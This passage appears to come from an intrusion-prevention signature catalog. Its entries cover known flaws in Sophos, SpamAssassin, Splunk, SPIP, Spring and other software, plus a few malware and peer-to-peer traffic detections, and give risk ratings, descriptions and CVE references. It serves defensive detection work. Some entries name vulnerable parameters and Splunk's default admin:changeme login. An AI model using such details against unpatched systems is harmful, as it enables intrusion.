Sophos-Anti-Virus-Cab-File-Invalid-Folder-Count-Heap-Overflow

About this vulnerability:

A vulnerability in Sophos Anti-Virus

Risk:

Moderate

First detected in:

sgpkg-ips-413-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Sophos Anti-Virus

Type:

Malfunction

Description:

There exists a heap overflow vulnerability in Sophos Anti-Virus as well as many other Sophos products that embed it. The vulnerability exists in the component that handles Microsoft CAB compressed files. A remote unauthenticated attacker can exploit the vulnerability causing a denial of service condition or the execution of arbitrary code within the security context of the Anti-Virus service, normally System. In a simple attack case aimed at creating a denial of service condition, the on-demand Sophos Anti-Virus console will freeze, the Sophos Anti-Virus service and on-access scanning functionality will also stop working. The service and all other Anti-Virus functions will not resume until the target computer is restarted or the "Sophos Anti-Virus" service is restarted manually. Note that in order to restart the service, the SavService.exe process needs to be terminated if it is still being executed. Furthermore, the application that calls Sophos Anti-Virus, such as Windows Explorer, may also freeze on accessing the malformed CAB files. In a more sophisticated attack scenario, where the malicious user is successful in injecting and executing supplied code, the behaviour of the system is dependent on the nature the injected code. Any code injected into the vulnerable component would execute in the security context of the affected service, normally System.

Situation:

File-Binary_Sophos-Anti-Virus-Cab-File-Invalid-Folder-Count-Heap-Overflow

References:

CVE-2006-0994
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0994

BID-17876
http://www.securityfocus.com/bid/17876

Sophos-Anti-Virus-PDF-Handling-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Sophos Threat Detection Engine

Risk:

High

First detected in:

sgpkg-ips-492-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Sophos Anti-Virus

Type:

Buffer Overflow

Description:

A stack buffer overflow vulnerability exists in Sophos Anti-Virus and Endpoint Protection. The vulnerability is due to the handling of encrypted PDF files. A remote attacker could exploit this vulnerability by causing Sophos Anti-Virus to process a specially crafted PDF file. Successful exploitation could result in arbitrary code execution in the context of the affected service, which is SYSTEM by default.

Situation:

File-PDF_Sophos-Anti-Virus-PDF-Handling-Stack-Buffer-Overflow

References:

OSVDB-87060
http://www.osvdb.org/87060

Sophos-Anti-Virus-Reserved-Device-Name-Handling

About this vulnerability:

A vulnerability in Sophos Anti-Virus

Risk:

High

First detected in:

sgpkg-ips-409-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Sophos Anti-Virus

Type:

Input Validation

Description:

A vulnerability in Sophos Anti-Virus may allow malicious code to evade detection. The vulnerability is caused by a design issue concerning the scanning of special device file names on the Windows platforms. This flaw can be exploited by malicious users as a method of bypassing the Sophos virus detection.

Situation:

E-Mail_HCS-Sophos-Anti-Virus-Reserved-Device-Name-Handling

References:

CVE-2004-0552
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0552

BID-11236
http://www.securityfocus.com/bid/11236

Sophos-Anti-Virus-Visio-File-Parsing-Buffer-Overflow

About this vulnerability:

A vulnerability in Sophos Anti-Virus

Risk:

Low

First detected in:

sgpkg-ips-634-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Sophos Anti-Virus; Sophos MailMonitor; Sophos Pure Message

Type:

Buffer Overflow

Description:

There exists a buffer overflow vulnerability in the Visio file scanning component of Sophos Anti-Virus. The vulnerability is caused by the lack of proper boundary verification of user supplied data. By sending a crafted Visio file to a target running the vulnerable product, a remote attacker can exploit this vulnerability to cause a denial-of-service or to inject and execute arbitrary code. Any code injected will be executed within the security context of the Anti-Virus service, normally System. In a simple attack case aimed at creating a denial of service condition, the on-demand Sophos Anti-Virus console will freeze, the Sophos Anti-Virus service and on-access function will also stop working. The service and whole Anti-Virus functions will not resume until the target computer is restarted. Note the application that calls Sophos Anti-Virus, such as Explorer, may also freeze on accessing the malformed Visio Binary files. In a more sophisticated attack scenario, where the malicious user is successful in injecting and executing supplied code, the behaviour of the system is dependent on the nature the injected code. Any code injected into the vulnerable component would execute in the security context of the affected process.

Situation:

File-OLE_Sophos-Anti-Virus-Visio-File-Parsing-Buffer-Overflow

References:

CVE-2005-2768
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2768

BID-14362
http://www.securityfocus.com/bid/14362

Sophos-Firewall-Authentication-Bypass-CVE-2022-1040

About this vulnerability:

A vulnerability in Sophos Firewall

Risk:

High

First detected in:

sgpkg-ips-1478-5242

Last changed:

sgpkg-ips-1478-5242

Platform:

Generic

Software:

Sophos Firewall

Type:

Malfunction

Description:

An authentication bypass vulnerability has been reported in the Sophos Firewall User Portal and Webadmin.

Situation:

HTTP_CRL-Sophos-Firewall-Authentication-Bypass-CVE-2022-1040

References:

CVE-2022-1040
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1040

Sophos-Firewall-User-Portal-And-WebAdmin-Code-Injection

About this vulnerability:

A vulnerability in Sophos XG Firewall

Risk:

Moderate

First detected in:

sgpkg-ips-1510-5242

Last changed:

sgpkg-ips-1510-5242

Platform:

Sophos XG Firewall

Software:

<os>

Type:

Input Validation

Description:

Improper validation of JSON keys submitted to the Controller endpoint of the Sophos XG Firewall causes a code injection vulnerability. A successful exploit allows an attacker to execute arbitrary code on the target.

Situation:

File-Text_Sophos-Firewall-User-Portal-And-WebAdmin-Code-Injection

References:

CVE-2022-3236
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3236

Sophos-UTM-WebAdmin-Sid-Command-Injection

About this vulnerability:

A vulnerability in Sophos UTM WebAdmin.

Risk:

High

First detected in:

sgpkg-ips-1401-5242

Last changed:

sgpkg-ips-1401-5242

Platform:

Linux; Unix

Software:

Sophos Web Appliance

Type:

Input Validation

Description:

A vulnerability in Sophos UTM WebAdmin, versions before v9.705 MR5, v9.607 MR7, and v9.511 MR11, which allows remote attackers to execute arbitrary commands due to the insuffiecient validation of the SID object value.

Situation:

File-Text_Sophos-UTM-WebAdmin-Sid-Command-Injection

References:

CVE-2020-25223
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25223

Sophos-Web-Appliance-Change_password-Admin-Password-Privilege-Escalation

About this vulnerability:

A vulnerability in Sophos Web Appliance

Risk:

High

First detected in:

sgpkg-ips-578-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Sophos Web Appliance

Type:

Malfunction

Description:

A privilege escalation vulnerability exists in Sophos Web Appliance. The vulnerability is due to errors in a change_password request when handling user input. A remote authenticated attacker could exploit this vulnerability by placing specially crafted data in a change_password request. Successful exploitation could allow an attacker to change the admin's password.

Situation:

HTTP_CRL-Sophos-Web-Appliance-Change_password-Admin-Password-Privilege-Escalation

References:

CVE-2014-2849
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2849

BID-66734
http://www.securityfocus.com/bid/66734

OSVDB-105635
http://www.osvdb.org/105635

Sophos-Web-Appliance-Command-Injection-CVE-2023-1671

About this vulnerability:

A vulnerability in Sophos Web Appliance

Risk:

High

First detected in:

sgpkg-ips-1672-5242

Last changed:

sgpkg-ips-1672-5242

Platform:

Generic

Software:

Sophos Web Appliance

Type:

Input Validation

Description:

An unauthenticated command injection vulnerability has been reported in Sophos Web Appliance versions prior to 4.3.10.4.

Situation:

HTTP_CRL-Sophos-Web-Appliance-Command-Injection-CVE-2023-1671

References:

CVE-2023-1671
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1671

Sophos-Web-Appliance-Directory-Traversal

About this vulnerability:

A Sophos-Web-Appliance-Directory-Traversal vulnerability.

Risk:

High

First detected in:

sgpkg-ips-700-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Sophos Web Appliance

Type:

Directory Traversal

Description:

A directory traversal vulnerability in Sophos Web Application, versions before 3.7.8.2, which allows remote attackers to read arbitrary files via the id parameter.

Situation:

HTTP_CRL_Sophos-Web-Appliance-Remote-Command-Execution

References:

CVE-2013-2641
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2641

BID-58833
http://www.securityfocus.com/bid/58833

Sophos-Web-Appliance-Remote-Command-Execution

About this vulnerability:

A Sophos Web Appliance Remote Command Execution vulnerability.

Risk:

High

First detected in:

sgpkg-ips-700-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Sophos Web Appliance

Type:

Input Validation

Description:

A vulnerability in Sophos Web Appliance, versions 3.7.9.1 and 3.8.1.1, which allows remote attackers to execute arbitrary commands via shell metacharacters in the domain parameter of end-user/index.php.

Situation:

References:

CVE-2013-4983
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4983

BID-62263
http://www.securityfocus.com/bid/62263

Sophos-Web-Appliance-Sophosconfig-Write-Command-Execution

About this vulnerability:

A vulnerability in Sophos Web Appliance

Risk:

Moderate

First detected in:

sgpkg-ips-579-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Sophos Web Appliance

Type:

Malfunction

Description:

A command execution vulnerability exists in Sophos Web Appliance. The vulnerability is due to an error in the sanitization function. A remote authenticated attacker could exploit this vulnerability by placing specially crafted data in a request. Successful exploitation could allow an attacker to execute arbitrary OS commands with root privileges.

Situation:

HTTP_CRL-Sophos-Web-Appliance-Sophosconfig-Write-Command-Execution

References:

CVE-2014-2850
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2850

BID-66734
http://www.securityfocus.com/bid/66734

OSVDB-105636
http://www.osvdb.org/105636

Sophos-XG-Firewall-Pre-Auth-SQL-Injection

About this vulnerability:

An attempt to exploit a vulnerability in Sophos XG Firewall detected

Risk:

High

First detected in:

sgpkg-ips-1406-5242

Last changed:

sgpkg-ips-1406-5242

Platform:

Sophos XG Firewall

Software:

<os>

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Sophos XG Firewall detected.

Situation:

HTTP_CRL-Sophos-XG-Firewall-Pre-Auth-SQL-Injection

References:

CVE-2020-12271
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12271

Sophosencrypt-Ransomware

About this vulnerability:	A transfer of SophosEncrypt ransomware executable detected
Risk:	High
First detected in:	sgpkg-ips-1860-5242
Last changed:	sgpkg-ips-1860-5242
Platform:	Windows
Software:	SophosEncrypt
Type:	Backdoor
Description:	SophosEncrypt ransomware file transfer.
Situation:	File-Exe_Sophosencrypt-Ransomware

SoreFang-Malware-Infection-Traffic

About this vulnerability:	SoreFang malware infection traffic detected
Risk:	High
First detected in:	sgpkg-ips-1373-5242
Last changed:	sgpkg-ips-1373-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	SoreFang malware infection traffic was detected.
Situation:	HTTP_CS-SoreFang-Malware-Infection-Traffic

SoulSeek-Peer-To-Peer-Network-Usage

About this vulnerability:	SoulSeek peer-to-peer network usage
Risk:	Moderate
First detected in:	sgpkg-ips-21-1210
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	SoulSeek
Type:	Peer-to-Peer
Description:	Soulseek is a peer-to-peer network that can be used to share files. File sharing can expose to security risks if unintentionally sharing confidential files or downloading files that contain malicious content such as viruses, worms, or backdoors.
Situation:	HTTP_CSH-P2P-SoulSeek-Client P2P-TCP_SoulSeek-Network-Connect

Sourcefire-Snort-Rule20275eval-Buffer-Overflow

About this vulnerability:	A vulnerability in Sourcefire Snort
Risk:	High
First detected in:	sgpkg-ips-528-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Snort
Type:	Buffer Overflow
Description:	A buffer overflow vulnerability has been reported in a pre-compiled Snort rule distributed by Sourcefire. The vulnerability is due to a stack buffer overflow in rule 3:20275. A remote unauthenticated attacker can leverage this vulnerability to achieve arbitrary code execution on a target system.
Situation:	MSRPC_SS-Sourcefire-Snort-Rule20275eval-Buffer-Overflow

Sourcegraph-gitserver-sshCommand-RCE

About this vulnerability:

A vulnerability in the Sourcegraph gitserver component.

Risk:

High

First detected in:

sgpkg-ips-1499-5242

Last changed:

sgpkg-ips-1499-5242

Platform:

Unix;Linux

Software:

Sourcegraph

Type:

Input Validation

Description:

A vulnerability in the Sourcegraph gitserver component, versions before 3.37.0, which allows remote attackers to execute arbitrary commands by modifying the core.sshCommand value within the git configuration.

Situation:

File-Text_Sourcegraph-gitserver-sshCommand-RCE

References:

CVE-2022-23642
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23642

SpamAssassin-Long-Message-Header-DoS

About this vulnerability:

A vulnerability in SpamAssassin

Risk:

High

First detected in:

sgpkg-ips-414-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

SpamAssassin

Type:

Resource Starvation

Description:

There exists a remote denial of service vulnerability in Apache SpamAssassin. The vulnerability is caused by an inefficient method used in email header parsing. An attacker can exploit the vulnerability by sending a malicious email that contains crafted headers. This can cause the affected application to terminate.

Situation:

E-Mail_HCS-SpamAssassin-Long-Message-Header-DoS

References:

CVE-2005-3351
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3351

BID-15373
http://www.securityfocus.com/bid/15373

OSVDB-11581
http://www.osvdb.org/11581

SpamAssassin-Malformed-Message-DoS

About this vulnerability:

A vulnerability in SpamAssassin

Risk:

High

First detected in:

sgpkg-ips-409-4219

Last changed:

sgpkg-ips-1495-5242

Platform:

Generic

Software:

SpamAssassin

Type:

Malfunction

Description:

There exists a vulnerability in the way SpamAssassin parses a specially crafted messages. An attacker exploiting this vulnerability can increase the likelihood of an e-mail address being block listed. If successful, legitimate messages from the e-mail address will be considered to be spam by the vulnerable product.

Situation:

File-Text_SpamAssassin-Malformed-Message-DoS

References:

BID-10898
http://www.securityfocus.com/bid/10898

SpamAssassin-Milter-Plugin-Shell-Command-Injection

About this vulnerability:

A command injection vulnerability in SpamAssassin Milter Plugin

Risk:

High

First detected in:

sgpkg-ips-295-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

SpamAssassin Milter Plugin

Type:

Malfunction

Description:

There is a command injection vulnerability in SpamAssassin Milter Plugin. A remote attacker can exploit this vulnerability to execute arbitrary shell commands with root privileges.

Situation:

SMTP_SpamAssassin-Milter-Plugin-Shell-Command-Injection

References:

BID-38578
http://www.securityfocus.com/bid/38578

OSVDB-62809
http://www.osvdb.org/62809

SpamAssassin-Spamd-Vpopmail-And-Paranoid-Options-Code-Execution

About this vulnerability:

Code execution vulnerability in the handling of the username string in SpamAssasin

Risk:

Moderate

First detected in:

sgpkg-ips-70-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

SpamAssassin

Type:

Code Injection

Description:

There is a code execution vulnerability in the handling of the username string in SpamAssasin. A successful exploitation of this vulnerability requires the Vpopmail and Paranoid options to be enabled and leads to arbitrary code execution with the privileges of the SpamAssassin spamd daemon process.

Situation:

Generic_SpamAssassin-Spamd-Vpopmail-And-Paranoid-Options-Code-Execution

References:

CVE-2006-2447
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2447

BID-18290
http://www.securityfocus.com/bid/18290

OSVDB-26177
http://www.osvdb.org/26177

SpamTitan-Unauthenticated-RCE

About this vulnerability:

An attempt to exploit a vulnerability in SpamTitan

Risk:

High

First detected in:

sgpkg-ips-1341-5242

Last changed:

sgpkg-ips-1341-5242

Platform:

Generic

Software:

SpamTitan

Type:

Input Validation

Description:

There exists a vulberability in SpamTitan, versions .01, 7.02, 7.03 and 7.07, which allows remote attacker to execute arbitrary commands by sending a crafted request to snmp-x.php which is appended to the snmpd.conf file by the application and executed.

Situation:

HTTP_CRL-SpamTitan-Unauthenticated-RCE

References:

CVE-2020-11698
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11698

Spectre-Side-Channel-Attack-JavaScript

About this vulnerability:

Spectre side-channel attack detected

Risk:

Moderate

First detected in:

sgpkg-ips-1034-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

<os>

Type:

Javascript Injection

Description:

A page was accessed that tries to exploit Spectre side channel vulnerability. A remote attacker could exploit this vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation could lead in information disclosure.

Situation:

File-Text_Spectre-Side-Channel-Attack-JavaScript

References:

CVE-2017-5715
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5715

SPIP-BigUp-Plugin-Unauthenticated-RCE

About this vulnerability:

An attempt to exploit a vulnerability in the BigUp plugin of SPIP detected

Risk:

High

First detected in:

sgpkg-ips-1779-5242

Last changed:

sgpkg-ips-1779-5242

Platform:

Windows; Unix; Linux

Software:

SPIP

Type:

Input Validation

Description:

A vulnerability in the BigUp plugin of SPIP, versions before 4.3.2, 4.2.16, and 4.1.18, which allows remote attackers to execute arbitrary code through the name parameter, by sending a crafted multipart file upload HTTP request with the bigup_retrouver_fichiers parameter set to any value.

Situation:

HTTP_CS-SPIP-BigUp-Plugin-Unauthenticated-RCE

References:

CVE-2024-8517
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-8517

SPIP-Form-PHP-Injection

About this vulnerability:

An attempt to exploit a vulnerability in SPIP detected

Risk:

High

First detected in:

sgpkg-ips-1657-5242

Last changed:

sgpkg-ips-1657-5242

Platform:

Generic

Software:

SPIP

Type:

Input Validation

Description:

A vulnerability in SPIP, versions before 3.2.18, before 4.0.10, before 4.1.18 and before 4.2.1, which allows remote attackers to execute arbitrary PHP code via the oubli parameter.

Situation:

HTTP_CRL-SPIP-Form-PHP-Injection

References:

CVE-2023-27372
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27372

SPIP-Porte-Plume-Plugin-RCE

About this vulnerability:	An attempt to exploit a vulnerability in SPIP
Risk:	Moderate
First detected in:	sgpkg-ips-1769-5242
Last changed:	sgpkg-ips-1769-5242
Platform:	Generic
Software:	SPIP
Type:	Input Validation
Description:	Improper validation of request contents causes a code injection vulnerability in SPIP. A successful exploitation allows an attacker to execute arbitrary code on the target system.
Situation:	File-Text_SPIP-Porte-Plume-Plugin-RCE

Splunk-Collect-File-Directory-Traversal

About this vulnerability:

A vulnerability in Splunk Splunk

Risk:

Moderate

First detected in:

sgpkg-ips-578-5211

Last changed:

sgpkg-ips-1588-5242

Platform:

Generic

Software:

Splunk

Type:

Input Validation

Description:

A directory traversal vulnerability has been found in Splunk. The vulnerability is due to insufficient sanitization of user-provided input to the advanced search functionality in the "file" parameter of the "collect" script. A remote attacker could exploit this vulnerability either by enticing an authenticated user to open a malicious page or by obtaining credentials and submitting an HTTP request. In the case of successful exploitation, a file could be written to the file system with the privileges of the affected application. This could possibly be leveraged to achieve code execution.

Situation:

HTTP_CSU-Splunk-Collect-File-Directory-Traversal

References:

CVE-2013-6771
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6771

BID-62632
http://www.securityfocus.com/bid/62632

OSVDB-97720
http://www.osvdb.org/97720

Splunk-Edit_User-Capability-Privilege-Escalation

About this vulnerability:

An attempt to exploit a vulnerability in Splunk detected

Risk:

High

First detected in:

sgpkg-ips-1659-5242

Last changed:

sgpkg-ips-1659-5242

Platform:

Linux;Windows

Software:

Splunk

Type:

Input Validation

Description:

A vulnerability in Splunk, versions before 9.0.5, 8.2.11, and 8.1.14, which allows low-privileged users to escalate their privileges to that of the admin user by providing a specially crafted web request due to the "edit_user" capability not honoring the "grantableRoles" setting in the authorize.conf.

Situation:

HTTP_CRL-Splunk-Edit_User-Capability-Privilege-Escalation

References:

CVE-2023-32707
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32707

Splunk-Enterprise-Alerts_Id-Server-Side-Request-Forgery

About this vulnerability:	A vulnerability in Splunk Enterprise
Risk:	Moderate
First detected in:	sgpkg-ips-900-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Splunk
Type:	Input Validation
Description:	Improper validation of the alerts_id parameter in HTTP requests sent to Splunk Enterprise causes a server-side request forgery vulnerability. A successful exploitation allows a remote attacker to obtain the user's API token.
Situation:	HTTP_CRL-Splunk-Enterprise-Alerts_Id-Server-Side-Request-Forgery

Splunk-Enterprise-Code-Execution-CVE-2023-46214

About this vulnerability:

A vulnerability in Splunk Enterprise

Risk:

High

First detected in:

sgpkg-ips-1657-5242

Last changed:

sgpkg-ips-1657-5242

Platform:

Generic

Software:

Splunk

Type:

Input Validation

Description:

A code execution vulnerability has been reported in Splunk Enterprise versions before 9.0.7 and 9.1.2. This vulnerability is due to a failure to safely sanitize user-provided extensible stylesheet language transformations.

Situation:

File-TextId_Splunk-Enterprise-Code-Execution-CVE-2023-46214

References:

CVE-2023-46214
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46214

Splunk-Enterprise-Data-Model-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Splunk Enterprise.

Risk:

High

First detected in:

sgpkg-ips-1533-5242

Last changed:

sgpkg-ips-1533-5242

Platform:

Windows;Linux

Software:

Splunk

Type:

Input Validation

Description:

A vulnerability in Splunk Enterprise, versions 8.1.11 and lower, 8.2.0 to 8.2.8, 9.0.0 to 9.0.1, which allows remote attackers to execute arbitrary code by sending a crafted request to the target server, due to improper encoding of fields provided by users when creating or editing data models.

Situation:

HTTP_CRL-Splunk-Enterprise-Data-Model-Stored-Cross-Site-Scripting

References:

CVE-2022-43569
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-43569

Splunk-Enterprise-Module_Resolver-Directory-Traversal

About this vulnerability:

A vulnerability in Splunk Enterprise

Risk:

Moderate

First detected in:

sgpkg-ips-1753-5242

Last changed:

sgpkg-ips-1753-5242

Platform:

Generic

Software:

Splunk

Type:

Directory Traversal

Description:

Improper validation of request URIs sent to the "/modules" endpoint causes a directory traversal vulnerability in Splunk. A successful exploitation allows an attacker to read arbitrary files on the target system.

Situation:

HTTP_CRL-Splunk-Enterprise-Module_Resolver-Directory-Traversal

References:

CVE-2024-36991
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-36991

Splunk-Enterprise-Radio-Reflected-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Splunk

Risk:

Moderate

First detected in:

sgpkg-ips-1535-5242

Last changed:

sgpkg-ips-1535-5242

Platform:

Generic

Software:

Splunk

Type:

Input Validation

Description:

Insufficient validation of user data in the radio.html template causes a cross-site scripting vulnerability in Splunk. A successful exploit allowsa an attacker to execute arbitrary scripts in a user's browser.

Situation:

HTTP_CRL-Splunk-Enterprise-Radio-Reflected-Cross-Site-Scripting

References:

CVE-2022-43568
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-43568

Splunk-Enterprise-Splunk-App-For-Lookup-File-Editing-Directory-Traversal

About this vulnerability:

A vulnerability in Splunk App for Lookup File Editing

Risk:

High

First detected in:

sgpkg-ips-1604-5242

Last changed:

sgpkg-ips-1604-5242

Platform:

Generic

Software:

Splunk

Type:

Directory Traversal

Description:

A directory traversal vulnerability has been reported in the Splunk App for Lookup File Editing. The vulnerability is due to insufficient validation of user data used in directory names. A remote, authenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in the disclosure of arbitrary files in the Splunk installation directory on the target server, or in the worst case, an attacker writing arbitrary files in the Splunk installation directory that could lead to arbitrary code execution under the security context of SYSTEM.

Situation:

HTTP_CSU-Splunk-Enterprise-Splunk-App-For-Lookup-File-Editing-Directory-Traversal
HTTP_CRL-Splunk-Enterprise-Splunk-App-For-Lookup-File-Editing-Directory-Traversal

References:

CVE-2023-32714
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32714

Splunk-Search-Remote-Code-Execution

About this vulnerability:

A Splunk Search Remote Code Execution vulnerability.

Risk:

High

First detected in:

sgpkg-ips-712-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Splunk

Type:

PHP Injection

Description:

A vulnerability in Splunk, versions 4.2.x before 4.2.5, that allows remote attackers to execute remote commands via the mappy search command. This fingerprint also covers the default admin password admin:changeme.

Situation:

HTTP_CRL-Splunk-Search-Remote-Code-Execution

References:

CVE-2011-4642
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4642

BID-51061
http://www.securityfocus.com/bid/51061

Spotify-Usage

About this vulnerability:	Spotify usage detected
Risk:	Moderate
First detected in:	sgpkg-ips-219-3038
Last changed:	sgpkg-ips-1296-5242
Platform:	Any Operating System
Software:	Spotify
Type:	Peer-to-Peer
Description:	Spotify is an proprietary streaming peer-to-peer application for listening to music online.
Situation:	Analyzer_Spotify-Usage Generic_UDP-Spotify-UDP-Traffic DNS-UDP_Spotify-Server-Query Generic_CS-Spotify-Network-Connect

Spring-Cloud-Config-Server-Directory-Traversal

About this vulnerability:

A vulnerability in Spring Cloud Config

Risk:

High

First detected in:

sgpkg-ips-1194-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Spring Cloud Config

Type:

Directory Traversal

Description:

A vulnerability in Spring Cloud Config, versions 2.1.x prior to 2.1.2, 2.0.x prior to 2.0.4, 1.4.x prior to 1.4.6, which allows remote attackers to obtain arbitrary config files through directory traversal.

Situation:

HTTP_CSU-Spring-Cloud-Config-Server-Directory-Traversal

References:

CVE-2019-3799
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3799

Spring-Cloud-Function-Spel-Code-Injection-CVE-2022-22963

About this vulnerability:

A vulnerability in Spring Cloud Function

Risk:

Moderate

First detected in:

sgpkg-ips-1450-5242

Last changed:

sgpkg-ips-1450-5242

Platform:

Generic

Software:

Spring Cloud Function

Type:

Input Validation

Description:

Improper validation of user-provided SpEL expressions causes a code injection vulnerability in Spring Cloud Function. A successful exploit allows a remote attacker to execute arbitrary code on the target system.

Situation:

HTTP_CSH-Spring-Cloud-Function-Spel-Code-Injection-CVE-2022-22963

References:

CVE-2022-22963
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22963

Spring-Core-Remote-Code-Execution

About this vulnerability:

A vulnerability in Spring Core

Risk:

High

First detected in:

sgpkg-ips-1449-5242

Last changed:

sgpkg-ips-1495-5242

Platform:

Generic

Software:

Spring Core

Type:

Input Validation

Description:

A security bypass vulnerability exists in Spring Core. The vulnerability is due to inadequate validation of parameters used for data binding, allowing for manipulation of the ClassLoader. A remote attacker could exploit this vulnerability by providing a crafted parameter in an HTTP request. Successful exploitation could lead to ClassLoader manipulation, which may lead to execution of arbitrary code under the security context of the container of the target application.

Situation:

HTTP_CRL-Spring-Core-Remote-Code-Execution
HTTP_CRL-Spring-Core-Remote-Code-Execution-Suspicious-Parameter-Name

References:

CVE-2022-22965
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965

Spring-Security-RegexRequestMatcher-Authorization-Bypass-CVE-2022-22978

About this vulnerability:

An attempt to exploit a vulnerability in Spring Security detected

Risk:

High

First detected in:

sgpkg-ips-1837-5242

Last changed:

sgpkg-ips-1837-5242

Platform:

Generic

Software:

Spring Security

Type:

Input Validation

Description:

In spring security versions prior to 5.4.11, 5.5.7, 5.6.4 and older unsupported versions, RegexRequestMatcher can easily be misconfigured to be bypassed on some servlet containers. Applications using RegexRequestMatcher with "." in the regular expression are possibly vulnerable to an authorization bypass.

Situation:

HTTP_CSU-Spring-Security-RegexRequestMatcher-Authorization-Bypass-CVE-2022-22978

References:

CVE-2022-22978
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22978

Springsource-Spring-Framework-HttpMessageConverter-Xml-External-Entity

About this vulnerability:

A vulnerability in SpringSource Spring Framework

Risk:

High

First detected in:

sgpkg-ips-573-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

SpringSource Spring Framework

Type:

Malfunction

Description:

An XML external entity vulnerability exists in SpringSource Spring Framework. The vulnerability is due to incorrectly configured XML parsing in Jaxb2RootElementHttpMessageConverter, which accepts XML external entities from untrusted sources. This vulnerability is due to an incomplete fix for CVE-2013-4152 and CVE-2013-6429. A remote, unauthenticated attacker can leverage this vulnerability by sending a malicious request to the target server. Successful exploitation would result in the disclosure of information from arbitrary files available in the security context of the server application, server-side request forgery, denial of service and potentially policy bypass.

Situation:

HTTP_CS-Xml-Dtd-External-Entity-Multiple-Vulnerabilities
File-TextId_Xml-Dtd-External-Entity-Multiple-Vulnerabilities

References:

CVE-2014-0054
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0054

BID-66148
http://www.securityfocus.com/bid/66148

OSVDB-104389
http://www.osvdb.org/104389

Springsource-Spring-Framework-Sourcehttpmessageconverter-Xxe-Vulnerability

About this vulnerability:

A vulnerability in SpringSource Spring Framework

Risk:

High

First detected in:

sgpkg-ips-566-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

SpringSource Spring Framework

Type:

Malfunction

Description:

An information disclosure vulnerability exists in SpringSource Spring Framework. The vulnerability is due to incorrectly configured XML parsing in the MVC's SourceHttpMessageConverter, which accepts XML external entities from untrusted sources. A remote, unauthenticated attacker can leverage this vulnerability by sending a malicious request to the target server. Successful exploitation would result in the disclosure of information from arbitrary files available in the security context of the server application.

Situation:

HTTP_CS-Xml-Dtd-External-Entity-Multiple-Vulnerabilities
File-TextId_Xml-Dtd-External-Entity-Multiple-Vulnerabilities

References:

CVE-2013-6429
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6429

OSVDB-102167
http://www.osvdb.org/102167

Springsource-Spring-Framework-XML-External-Entity-Information-Disclosure

About this vulnerability:

A vulnerability in SpringSource Spring Framework

Risk:

Moderate

First detected in:

sgpkg-ips-542-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

SpringSource Spring Framework

Type:

Malfunction

Description:

